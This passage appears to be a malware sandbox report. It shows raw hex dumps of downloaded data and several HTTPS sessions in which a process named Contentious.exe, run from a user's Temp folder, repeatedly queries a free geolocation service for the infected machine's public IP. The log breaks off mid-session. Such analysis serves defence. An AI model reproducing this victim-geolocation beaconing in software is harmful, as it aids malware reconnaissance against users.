                                          2024-07-25 07:56:42 UTC16384INData Raw: 5e d2 42 35 db 2f ed 5a 61 ff 3a 66 1e 71 98 76 da da 4a ea 86 64 70 33 16 37 c7 e0 7b b1 22 5b 80 1e 81 72 85 15 38 17 1d 25 3b 92 65 f1 f3 39 99 b4 97 4c b2 30 fb f7 4e cf 49 08 40 95 f2 71 47 a4 02 16 2b b2 e1 22 70 a3 7f d6 b3 ec 83 7b 74 13 bd aa 63 d1 08 ce c0 74 19 4c 6e 6d ef d6 6a f5 4c 7c b3 68 dc 80 9c 5c c2 59 ca 22 cb 88 c9 8a 11 90 61 f5 46 f7 dd e6 f9 90 69 c0 c2 8d f9 e2 68 33 12 23 9f c8 05 0f 23 4a d9 38 e1 5f 45 20 10 3d 3b 2d 6e a4 f5 4e 9a 0d e8 be 40 bb 15 90 2f 64 6e 58 b7 fe bc c5 53 17 c1 f7 ec 7f d7 4e d9 de 37 e9 76 39 99 e3 3c 7c 5b 16 02 69 8e 15 d7 fe 9c 29 b2 2a c4 61 db 09 86 f0 5d 4e 56 01 79 0c d9 15 6b 48 a8 7a a1 ef 77 0e 90 64 0e ac 9e 7f 56 3b 6c da 0e 77 82 c9 16 3f 35 bf bb 66 32 7e 5e 4f eb 28 d1 07 6d b7 f4 ae 33
                                          Data Ascii: ^B5/Za:fqvJdp37{"[r8%;e9L0NI@qG+"p{tctLnmjL|h\Y"aFih3##J8_E =;-nN@/dnXSN7v9<|[i)*a]NVykHzwdV;lw?5f2~^O(m3
                                          2024-07-25 07:56:42 UTC16384INData Raw: 76 5b e0 aa c2 f4 cd d1 00 3a aa b7 65 d4 9b 6b b7 5a 83 82 9c e6 08 bf 60 0a 3f 36 d3 b5 c8 70 1e 2c aa c1 a5 f9 f2 9a ac 94 d4 d3 c0 f8 8a b1 89 67 6e 8d ed d5 2b 42 36 06 e8 d4 3e 63 7f 08 f8 d3 08 8a 3d 1e 8e 1f db 24 a6 90 9b ff 74 52 e0 9c d2 8f b3 10 f0 6a 26 35 da 15 d0 e8 ad 4b b9 1e a1 e5 ba 0d 59 f0 4d e0 84 4a d9 99 de 65 94 9e e3 c2 96 13 dd 4a 29 cc b0 2d 48 a2 98 ed 5a 89 c5 bd 02 b2 b2 bc ad d1 b6 d8 63 c9 39 26 e0 1b 84 ba 7f 75 39 89 b4 1d 67 e6 9e d7 61 0a 85 e4 af 08 6d e3 2c a6 df 3a 31 8a 15 c1 3f a6 37 fd ea 56 32 e0 8a 28 ba 1d 2b e1 13 c9 32 2c fb 7f b4 4c 78 79 15 8e 35 40 f7 c9 b0 e7 78 45 ac 6c ef 51 5a eb 54 6a 2e ec 49 7e bd e8 a6 57 da fe 91 56 13 f3 a1 0f 6e 95 16 5e cb 57 32 c6 bb ec 13 15 55 80 fd 4e 42 31 e4 cb cf 4d 54
                                          Data Ascii: v[:ekZ`?6p,gn+B6>c=$tRj&5KYMJeJ)-HZc9&u9gam,:1?7V2(+2,Lxy5@xElQZTj.I~WVn^W2UNB1MT
                                          2024-07-25 07:56:42 UTC16384INData Raw: 0f 19 15 99 0b 7b 43 9d 47 05 f9 be 5b 3d 3c 92 07 b7 51 6f 2b 13 38 80 bc 19 4a 8d 03 3e 72 2d f7 8a f0 1a 95 f8 bc b6 57 79 80 44 8a f4 83 2b 10 6e 9d 6b ae e1 a0 38 f1 c6 5d 66 d5 51 84 62 1b 1a de 34 be bb 1d c9 41 e3 62 5e 72 ba 91 7e cd ff 85 5f 5a 5f aa 9e b1 2e fc 61 77 40 71 60 bd 2f 25 e9 cf cb 76 82 87 f7 5c cb 5e 26 31 21 79 92 04 b0 fa 49 e7 f0 b7 ca 21 7a 01 c0 7f c0 46 f9 66 d5 43 d3 00 31 b6 e1 ed d7 97 cf dc bc e5 5c b8 59 34 e9 64 df e2 83 40 54 f3 af a2 33 3c fe 47 1b 0c ad a4 6f 00 27 39 0c e2 09 f3 b4 db db 89 d3 fa b5 ff 19 02 82 8b fa 6f 82 24 e1 e1 a6 aa 57 0d 3a fb 2e f0 f6 e5 05 c4 35 84 0b cd b7 1a 77 cd 28 e8 de c9 0d 52 39 5f c1 45 df cc 5f 69 db 46 83 2c 40 aa 20 bc f4 88 48 d2 36 5a 15 20 59 7c 84 54 3f 27 8b 85 2d 25 81 cd
                                          Data Ascii: {CG[=<Qo+8J>r-WyD+nk8]fQb4Ab^r~_Z_.aw@q`/%v\^&1!yI!zFfC1\Y4d@T3<Go'9o$W:.5w(R9_E_iF,@ H6Z Y|T?'-%
                                          2024-07-25 07:56:42 UTC16384INData Raw: 7c f4 2d e9 10 e8 ca c5 c6 b1 46 bb b3 ef f6 7d 7a 6f 53 75 22 b1 df 13 18 7f d4 a2 3f 82 4a 9b 3f 0b a2 bf 9d a4 87 50 bc 6a a9 93 1e 22 c0 af 24 fb 16 d1 e4 e6 ba b5 6b 56 14 d7 3f 65 07 19 57 c8 6c 3e b8 d2 ec ef 4c 0c fb 94 fe 1b d7 9f 0f 48 d0 ac ee e3 30 d2 c8 be f5 68 31 ce 19 19 49 e3 a8 95 ae 5e 79 06 a1 9e e8 f4 e7 82 62 42 f5 6d 27 ba 41 1a 9c 3c fd bc e4 66 3f 8a 4d 69 4f 8d bb aa 64 ba 3c eb c1 ae a5 a1 50 48 91 dd fd 81 67 a2 6a a2 6d 8b 8f 72 0e 8e e2 02 08 80 ab e8 3b b4 cd f1 67 96 a8 e1 24 b8 d2 d1 99 cd a8 b9 40 15 d8 1b a4 c5 e1 d2 4a 65 0d e3 35 68 7f b2 26 a8 f4 da d8 ce 8d 4d b3 89 19 66 2d bf 04 b1 16 55 0e 45 46 ad 4c c2 94 63 93 c4 e5 3d 48 06 2e 1c 97 fe a6 5c 3f cd 6d c1 4d c3 25 26 ae 69 6e 7b bb 4a 4a 77 c8 22 6f fe ba ec 19
                                          Data Ascii: |-F}zoSu"?J?Pj"$kV?eWl>LH0h1I^ybBm'A<f?MiOd<PHgjmr;g$@Je5h&Mf-UEFLc=H.\?mM%&in{JJw"o
                                          2024-07-25 07:56:42 UTC2965INData Raw: 1f 19 f6 98 28 e7 c1 71 68 5d f2 a0 74 35 d2 07 b5 c5 9e e6 23 28 0f a7 a2 96 f1 28 f8 fc 22 6d 0a 37 18 97 b2 00 de 41 5d dd 59 f1 87 3d 2e b7 20 ad 4d b4 c8 8a b3 0d 8b 7f ea 66 fc db 94 84 d5 cc a1 b6 ee 88 ac 15 7d 4a 5d ae a2 7b 76 4d 12 c2 0b 87 05 fe 1a 63 54 40 60 12 ed aa 64 e6 77 98 d9 2f e3 68 e7 4f 61 d8 37 da ce cc 83 2f 4e 8c 86 94 09 ad 37 b0 d4 d3 c7 00 0c aa c8 43 05 27 36 52 61 fb 74 a7 84 d8 13 d0 4b b6 67 3f 66 b8 f7 57 7f 63 53 d4 70 f9 59 62 2c 85 5a ea e7 48 66 e3 16 ae 5f f8 5f 26 2d 94 fa 59 1a 92 31 79 48 42 f0 46 02 40 07 37 5e 19 5b f1 77 77 77 dc 8e 37 a3 f9 51 23 6d 7b c0 c6 5e 0d e5 65 89 3c df d0 11 ad 26 7e e8 e7 30 0b b4 6a 66 68 d1 4c 15 2a cd 03 39 9c 46 c5 75 e0 f8 e5 17 6c e8 c5 2b 97 24 bb 9b 74 3f 44 83 0d 1e 19 46
                                          Data Ascii: (qh]t5#(("m7A]Y=. Mf}J]{vMcT@`dw/hOa7/N7C'6RatKg?fWcSpYb,ZHf__&-Y1yHBF@7^[www7Q#m{^e<&~0jfhL*9Ful+$t?DF


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.449738188.114.96.34437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:45 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-25 07:56:45 UTC706INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:45 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22928
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2s6HZvNveDZLCWoTWwnk4UNTYhMlSSSiHV4PKoVo%2BNHwu3OuXK4r%2Bf0XIzAYt88YxxlXAmwZa4Jf8o%2FpUFH2T08nvtP25QhWNOF0CCVNmGJ7zjMSpQ1ODPAaIrXifaSPtEwUNbzt"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a9861ff7c1885-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.449739188.114.96.34437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:47 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2024-07-25 07:56:47 UTC710INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:47 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22930
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ClLRaZdr9LAVI9xue%2BwdYi0RiM1CoGuj1mWlJvyAv7d7YW7M89xPNQ6SNqGVzKY5Uwbgrr2%2Bu5yq%2FdRGDcUyr4DyjNs23hnGSvciE%2FR4pJrGfTq7Oyh7KJcUGUw%2FXtuEnrWv8113"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a986e6acb43a4-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:47 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.449741188.114.96.34437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:50 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-25 07:56:51 UTC704INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:50 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22933
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlbW34TTGINwz%2BTPygNna6fXiEkdpbSNWVHp7xEWuTcxSp2CdExtAIcgffubmdBTRa70zRKHcjbuQS%2Fy1ZInoXzaA4AgM8qH7R2Tf6QN42KnIxAMMhRnf3IoTKRnlymqZLYOECDU"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a988298021a3c-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:51 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.449744188.114.96.34437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:53 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2024-07-25 07:56:53 UTC706INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:53 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22936
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JTqAEpWvz1YS8Tit2UiIZVN8y8M0EifKHEIYuY0C4rkMjigg2Q45ALCMAgIL%2F0hnUZ0khaiBGLC8BBtjj2HdsVf6oz6FH6WTUwg0VOTuBkkQiwqxflIfuO3qMQIe%2F%2Bf4EQXGmCj6"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98928ec642e2-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:53 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.449746188.114.96.34437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:55 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2024-07-25 07:56:55 UTC708INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:55 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22938
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ioBcbA%2B4o6h6qijkKwC7S0Bdd5McQw9koUlzYyDV%2F8yaaDM4Ki7qRKNpvIycKHPEeq8ZsbdcoHlhK1nTzNf0kNdilK3hNr3KUL%2FQW5ulEQ6o%2FyK9ocADG9ZILYNnedbRs5xkRo9q"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98a059f5c32d-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:55 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.449748188.114.96.34437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:57 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-25 07:56:57 UTC716INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:57 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22940
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6X0iEhTJPdHOENC%2FuCqwl3EbtHhzZlXclEsNowVRSdkJ%2F%2FlNsW89rXENF3FQC9U%2BAgdfd9MmGNy3AoDo5a%2BQ%2BeVkPNnFAykBCjdClkj0zIYYgTRsw0oeoEKJnBZL%2BBqX7l%2BvTL5y"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98acadffc32a-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:57 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.449750188.114.96.34437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:56:59 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-25 07:56:59 UTC706INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:59 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22942
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XRYBBDf3kzk%2FOhPMwvqIAilhCbYXjm8vjR6GYDnCW4EdCpf1yl%2F4%2Fp8nFQ7AnYvXTRW7Y6JpOH0uQXkAiimLEQal7Phmlf6xbvusiuhMmKBfcGIMUJGFgWKbRNwqcGQ9bIgENlJR"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98b568398ca5-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-07-25 07:56:59 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                          2024-07-25 07:56:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.449752188.114.96.34437972C:\Users\user\AppData\Local\Temp\Contentious.exe
                                          TimestampBytes transferredDirectionData
                                          2024-07-25 07:57:01 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2024-07-25 07:57:01 UTC710INHTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:57:01 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22944
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
